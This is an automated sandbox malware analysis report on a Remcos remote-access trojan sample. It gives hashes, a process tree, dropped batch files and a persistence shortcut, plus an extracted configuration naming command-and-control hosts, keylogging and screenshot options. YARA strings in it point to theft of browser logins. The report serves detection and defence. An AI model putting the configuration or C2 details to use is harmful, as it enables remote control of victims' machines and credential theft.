Loading ...

Play interactive tourEdit tour

Analysis Report V8IB839cvz.exe

Overview

General Information

Sample Name:V8IB839cvz.exe
Analysis ID:429553
MD5:10d42f55d89b6fd42404e470e68f1996
SHA1:3b9787bbfaae456fe082db8e2e61c70c5fb45328
SHA256:b84a345efddfa5a852c3e3c5c2c97dab1a6f4643906d80c0c8cafa1e25247326
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • V8IB839cvz.exe (PID: 7136 cmdline: 'C:\Users\user\Desktop\V8IB839cvz.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • V8IB839cvz.exe (PID: 6584 cmdline: C:\Users\user\Desktop\V8IB839cvz.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
    • cmd.exe (PID: 2228 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Xypgtv.exe (PID: 6740 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • Xypgtv.exe (PID: 6480 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
  • Xypgtv.exe (PID: 7004 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • Xypgtv.exe (PID: 6324 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\vtgpyX.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
      • 0x9b4:$file: URL=
      • 0x998:$url_explicit: [InternetShortcut]
      00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
      • 0xc28:$file: URL=
      • 0xc0c:$url_explicit: [InternetShortcut]
      00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 26 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.V8IB839cvz.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          2.2.V8IB839cvz.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x54788:$str_b2: Executing file:
          • 0x5a06c:$str_b3: GetDirectListeningPort
          • 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x54ecc:$str_b5: licence_code.txt
          • 0x54cf8:$str_b7: \update.vbs
          • 0x547f8:$str_b9: Downloaded file:
          • 0x547c4:$str_b10: Downloading file:
          • 0x547ac:$str_b12: Failed to upload file:
          • 0x5a040:$str_b13: StartForward
          • 0x5a060:$str_b14: StopForward
          • 0x54c50:$str_b15: fso.DeleteFile "
          • 0x54be4:$str_b16: On Error Resume Next
          • 0x54c80:$str_b17: fso.DeleteFolder "
          • 0x5479c:$str_b18: Uploaded file:
          • 0x54838:$str_b19: Unable to delete:
          • 0x54c18:$str_b20: while fso.FileExists("
          • 0x549b5:$str_c0: [Firefox StoredLogins not found]
          • 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!]
          • 0x548c5:$str_c3: [Chrome StoredLogins not found]
          17.2.Xypgtv.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            17.2.Xypgtv.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x54788:$str_b2: Executing file:
            • 0x5a06c:$str_b3: GetDirectListeningPort
            • 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x54ecc:$str_b5: licence_code.txt
            • 0x54cf8:$str_b7: \update.vbs
            • 0x547f8:$str_b9: Downloaded file:
            • 0x547c4:$str_b10: Downloading file:
            • 0x547ac:$str_b12: Failed to upload file:
            • 0x5a040:$str_b13: StartForward
            • 0x5a060:$str_b14: StopForward
            • 0x54c50:$str_b15: fso.DeleteFile "
            • 0x54be4:$str_b16: On Error Resume Next
            • 0x54c80:$str_b17: fso.DeleteFolder "
            • 0x5479c:$str_b18: Uploaded file:
            • 0x54838:$str_b19: Unable to delete:
            • 0x54c18:$str_b20: while fso.FileExists("
            • 0x549b5:$str_c0: [Firefox StoredLogins not found]
            • 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!]
            • 0x548c5:$str_c3: [Chrome StoredLogins not found]
            15.2.Xypgtv.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 1 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Xypgtv\Xypgtv.exe, NewProcessName: C:\Users\Public\Xypgtv\Xypgtv.exe, OriginalFileName: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentCommandLine: 'C:\Users\Public\Xypgtv\Xypgtv.exe' , ParentImage: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentProcessId: 6740, ProcessCommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, ProcessId: 6480

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 17.2.Xypgtv.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeReversingLabs: Detection: 41%
              Multi AV Scanner detection for submitted fileShow sources
              Source: V8IB839cvz.exeReversingLabs: Detection: 41%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: V8IB839cvz.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00427D99 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
              Source: V8IB839cvz.exe, 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeUnpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack
              Source: V8IB839cvz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004041E6 FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043C2E9 FindFirstFileExA,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: nothinglike.ac.ug
              Source: global trafficTCP traffic: 192.168.2.4:49745 -> 79.134.225.25:6969
              Source: Joe Sandbox ViewIP Address: 79.134.225.25 79.134.225.25
              Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,
              Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040C00C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C086
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042E10C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00443116
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041426F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042A35E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00441327
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042D48A
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C724
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C867
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042D8A2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00441A39
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00447B40
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041BB8F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042DCD7
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042FCE9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00412CF0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042AE10
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00427EA4
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042FF18
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00436FF0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042CF8E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: String function: 00429310 appears 50 times
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: String function: 0040207E appears 51 times
              Source: V8IB839cvz.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Xypgtv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: V8IB839cvz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\Public\vtgpyX.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
